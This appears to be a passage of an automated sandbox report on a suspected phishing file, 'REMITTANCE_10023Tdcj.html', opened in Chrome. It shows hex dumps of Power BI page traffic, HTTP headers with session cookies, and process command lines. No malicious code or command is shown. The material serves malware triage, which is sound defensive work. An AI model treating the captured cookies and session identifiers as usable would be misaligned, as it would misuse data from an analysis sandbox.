                                                                                                                                                                                                          2024-12-11 23:30:23 UTC4096INData Raw: 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 65 6e 74 2e 70 6f 77 65 72 61 70 70 73 2e 63 6f 6d 2f 72 65 73 6f 75 72 63 65 2f 70 6f 77 65 72 62 69 77 66 65 2f 73 74 79 6c 65 73 2f 70 6f 77 65 72 42 49 43 6f 6d 6d 6f 6e 2e 6d 69 6e 2e 30 61 38 38 61 31 37 36 31 36 66 31 65 33 34 66 61 37 31 63 2e 63 73 73 22 20 6f 6e 65 72 72 6f 72 3d 63 64 6e 46 61 6c 6c 62 61 63 6b 28 65 76 65 6e 74 29 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 65 6e 74 2e 70 6f 77 65 72 61 70 70 73 2e 63 6f 6d 2f 72 65 73 6f 75 72 63 65 2f 70 6f 77 65 72 62 69 77 66 65 2f 73 74 79 6c 65 73 2f 70 6f 77 65 72 42 49 50 72 6f 76 69 64 65 72 73 43 6f 6d 6d 6f
                                                                                                                                                                                                          Data Ascii: tylesheet" href="https://content.powerapps.com/resource/powerbiwfe/styles/powerBICommon.min.0a88a17616f1e34fa71c.css" onerror=cdnFallback(event) /><link rel="stylesheet" href="https://content.powerapps.com/resource/powerbiwfe/styles/powerBIProvidersCommo
                                                                                                                                                                                                          2024-12-11 23:30:23 UTC4096INData Raw: 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 74 68 69 73 2e 70 61 72 73 65 54 69 6d 65 4d 61 72 6b 65 72 73 20 3d 20 74 68 69 73 2e 70 61 72 73 65 54 69 6d 65 4d 61 72 6b 65 72 73 20 7c 7c 20 7b 7d 3b 20 74 68 69 73 2e 70 61 72 73 65 54 69 6d 65 4d 61 72 6b 65 72 73 5b 27 6a 71 75 65 72 79 2e 67 6c 6f 62 61 6c 69 7a 65 2f 67 6c 6f 62 61 6c 69 7a 65 2e 6d 69 6e 2e 6a 73 27 5d 20 3d 20 7b 20 6e 6f 6d 69 6e 61 6c 53 74 61 72 74 3a 20 44 61 74 65 2e 6e 6f 77 28 29 2c 20 73 74 61 72 74 3a 20 44 61 74 65 2e 6e 6f 77 28 29 2c 20 69 6e 69 74 69 61 6c 3a 20 74 72 75 65 20 7d 3b 20 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 73 72 63 3d 22 68 74 74 70 73
                                                                                                                                                                                                          Data Ascii: pt type="text/javascript">this.parseTimeMarkers = this.parseTimeMarkers || {}; this.parseTimeMarkers['jquery.globalize/globalize.min.js'] = { nominalStart: Date.now(), start: Date.now(), initial: true }; </script><script type="text/javascript" src="https
                                                                                                                                                                                                          2024-12-11 23:30:23 UTC1840INData Raw: 72 72 6f 72 41 72 72 61 79 29 20 3a 20 6e 75 6c 6c 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 6e 75 6c 6c 50 75 69 64 20 3d 20 27 30 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 49 66 20 74 65 6e 61 6e 74 20 61 6e 64 20 75 73 65 72 20 6d 65 74 61 64 61 74 61 20 61 72 65 20 6e 6f 74 20 70 72 65 73 65 6e 74 20 6f 6e 20 77 69 6e 64 6f 77 20 61 6c 72 65 61 64 79 2c 20 73 65 74 20 74 68 65 6d 20 66 72 6f 6d 20 70 72 65 2d 72 65 64 69 72 65 63 74 20 70 61 67 65 20 63 6f 6e 74 65 78 74 2e 0d 0a 20 20 20 20 20 20 20 20 69 66 20 28 21 77 69 6e 64 6f 77 2e 74 65 6e 61 6e 74 49 64 20 26 26 20 74 65 6e 61 6e 74 49 64 46 72 6f 6d 52 65 71 75 65 73 74 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 74 65 6e 61 6e 74 49 64 20 3d 20 74 65
                                                                                                                                                                                                          Data Ascii: rrorArray) : null; var nullPuid = '0'; // If tenant and user metadata are not present on window already, set them from pre-redirect page context. if (!window.tenantId && tenantIdFromRequest) { window.tenantId = te


                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                          37192.168.2.45009320.38.136.704431748C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                          2024-12-11 23:30:26 UTC642OUTGET /favicon.ico HTTP/1.1
                                                                                                                                                                                                          Host: app.powerbi.com
                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                          Cookie: ARRAffinity=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ARRAffinitySameSite=d18ffea516fc61e70e17903a154d4cb10e9da3226b374aa80bb8036660648560; ai_user=2kQWAod7KlEqEF58e20SmV|2024-12-11T23:30:09.794Z; ai_session=5euVcVh3S9yhv4eHm/fvHb|1733959809798|1733959809798
                                                                                                                                                                                                          2024-12-11 23:30:26 UTC318INHTTP/1.1 200 OK
                                                                                                                                                                                                          Content-Length: 17782
                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                          Date: Wed, 11 Dec 2024 23:30:26 GMT
                                                                                                                                                                                                          Cache-Control: private
                                                                                                                                                                                                          Set-Cookie: WFESessionId=0315cb47-21cb-41b8-8a27-7ab8e1424a82; path=/;Partitioned;; secure
                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                          2024-12-11 23:30:26 UTC3562INData Raw: 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 3e 0d 0a 20 20 20 20 3c 68 65 61 64 3e 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 50 6f 77 65 72 20 42 49 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 3b 22 20 2f 3e 0d 0a 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e
                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" > <head> <title>Power BI Error</title> <meta http-equiv="X-UA-Compatible" content="IE=edge;" /> <meta charset="utf-8"> <meta name="description" conten
                                                                                                                                                                                                          2024-12-11 23:30:26 UTC4096INData Raw: 72 65 2e 63 6f 6d 2f 27 3b 0d 0a 20 20 20 20 76 61 72 20 74 65 6c 65 6d 65 74 72 79 53 65 73 73 69 6f 6e 49 64 20 3d 20 20 27 30 33 31 35 63 62 34 37 2d 32 31 63 62 2d 34 31 62 38 2d 38 61 32 37 2d 37 61 62 38 65 31 34 32 34 61 38 32 27 3b 0d 0a 20 20 20 20 76 61 72 20 6f 70 74 69 6d 69 7a 65 64 41 70 70 4d 65 74 61 64 61 74 61 46 6f 72 41 70 70 4c 61 6e 64 69 6e 67 45 6e 61 62 6c 65 64 46 6f 72 42 6f 6f 74 73 74 72 61 70 20 3d 20 27 74 72 75 65 27 3b 0d 0a 20 20 20 20 76 61 72 20 72 65 71 75 65 73 74 57 56 32 46 69 72 73 74 20 3d 20 74 72 75 65 3b 0d 0a 20 20 20 20 76 61 72 20 70 6f 77 65 72 42 49 47 6f 61 6c 73 45 6e 61 62 6c 65 64 46 6f 72 42 6f 6f 74 73 74 72 61 70 20 3d 20 66 61 6c 73 65 3b 0d 0a 20 20 20 20 76 61 72 20 65 6d 62 65 64 64 65 64 57 65
                                                                                                                                                                                                          Data Ascii: re.com/'; var telemetrySessionId = '0315cb47-21cb-41b8-8a27-7ab8e1424a82'; var optimizedAppMetadataForAppLandingEnabledForBootstrap = 'true'; var requestWV2First = true; var powerBIGoalsEnabledForBootstrap = false; var embeddedWe
                                                                                                                                                                                                          2024-12-11 23:30:26 UTC4096INData Raw: 79 6c 65 73 2f 49 6e 66 6f 4e 61 76 2e 43 6f 6d 6d 6f 6e 2e 6d 69 6e 2e 61 32 62 64 34 30 32 34 32 36 35 62 35 64 36 65 38 63 35 39 2e 63 73 73 22 20 6f 6e 65 72 72 6f 72 3d 63 64 6e 46 61 6c 6c 62 61 63 6b 28 65 76 65 6e 74 29 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 6f 6e 74 65 6e 74 2e 70 6f 77 65 72 61 70 70 73 2e 63 6f 6d 2f 72 65 73 6f 75 72 63 65 2f 70 6f 77 65 72 62 69 77 66 65 2f 73 74 79 6c 65 73 2f 70 6f 77 65 72 42 49 43 6f 6d 6d 6f 6e 2e 6d 69 6e 2e 30 61 38 38 61 31 37 36 31 36 66 31 65 33 34 66 61 37 31 63 2e 63 73 73 22 20 6f 6e 65 72 72 6f 72 3d 63 64 6e 46 61 6c 6c 62 61 63 6b 28 65 76 65 6e 74 29 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c
                                                                                                                                                                                                          Data Ascii: yles/InfoNav.Common.min.a2bd4024265b5d6e8c59.css" onerror=cdnFallback(event) /><link rel="stylesheet" href="https://content.powerapps.com/resource/powerbiwfe/styles/powerBICommon.min.0a88a17616f1e34fa71c.css" onerror=cdnFallback(event) /><link rel="styl
                                                                                                                                                                                                          2024-12-11 23:30:26 UTC4096INData Raw: 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 74 68 69 73 2e 70 61 72 73 65 54 69 6d 65 4d 61 72 6b 65 72 73 5b 27 68 61 73 68 2d 6d 61 6e 69 66 65 73 74 2e 6a 73 27 5d 2e 65 6e 64 20 3d 20 44 61 74 65 2e 6e 6f 77 28 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 74 68 69 73 2e 70 61 72 73 65 54 69 6d 65 4d 61 72 6b 65 72 73 20 3d 20 74 68 69 73 2e 70 61 72 73 65 54 69 6d 65 4d 61 72 6b 65 72 73 20 7c 7c 20 7b 7d 3b 20 74 68 69 73 2e 70 61 72 73 65 54 69 6d 65 4d 61 72 6b 65 72 73 5b 27 6a 71 75 65 72 79 2e 67 6c 6f 62 61 6c 69 7a 65 2f 67 6c 6f 62 61 6c 69 7a 65 2e 6d 69 6e 2e 6a 73 27 5d 20 3d 20 7b 20 6e 6f 6d 69 6e 61 6c 53 74 61 72 74 3a 20 44 61 74 65 2e 6e 6f
                                                                                                                                                                                                          Data Ascii: "text/javascript">this.parseTimeMarkers['hash-manifest.js'].end = Date.now();</script><script type="text/javascript">this.parseTimeMarkers = this.parseTimeMarkers || {}; this.parseTimeMarkers['jquery.globalize/globalize.min.js'] = { nominalStart: Date.no
                                                                                                                                                                                                          2024-12-11 23:30:26 UTC1932INData Raw: 27 27 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 65 72 72 6f 72 41 72 72 61 79 20 3d 20 20 27 27 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 65 72 72 6f 72 41 72 72 61 79 4f 62 6a 65 63 74 20 3d 20 65 72 72 6f 72 41 72 72 61 79 20 3f 20 4a 53 4f 4e 2e 70 61 72 73 65 28 65 72 72 6f 72 41 72 72 61 79 29 20 3a 20 6e 75 6c 6c 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 6e 75 6c 6c 50 75 69 64 20 3d 20 27 30 27 3b 0d 0a 0d 0a 20 20 20 20 20 20 20 20 2f 2f 20 49 66 20 74 65 6e 61 6e 74 20 61 6e 64 20 75 73 65 72 20 6d 65 74 61 64 61 74 61 20 61 72 65 20 6e 6f 74 20 70 72 65 73 65 6e 74 20 6f 6e 20 77 69 6e 64 6f 77 20 61 6c 72 65 61 64 79 2c 20 73 65 74 20 74 68 65 6d 20 66 72 6f 6d 20 70 72 65 2d 72 65 64 69 72 65 63 74 20 70 61 67 65 20 63 6f 6e 74 65 78
                                                                                                                                                                                                          Data Ascii: ''; var errorArray = ''; var errorArrayObject = errorArray ? JSON.parse(errorArray) : null; var nullPuid = '0'; // If tenant and user metadata are not present on window already, set them from pre-redirect page contex


                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                          Start time:18:28:37
                                                                                                                                                                                                          Start date:11/12/2024
                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\REMITTANCE_10023Tdcj.html"
                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                          Start time:18:28:39
                                                                                                                                                                                                          Start date:11/12/2024
                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=2028,i,13264855427996641456,9624318875190211204,262144 /prefetch:8
                                                                                                                                                                                                          Imagebase:0x7ff76e190000
                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                          MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                          Reputation:high
                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                          No disassembly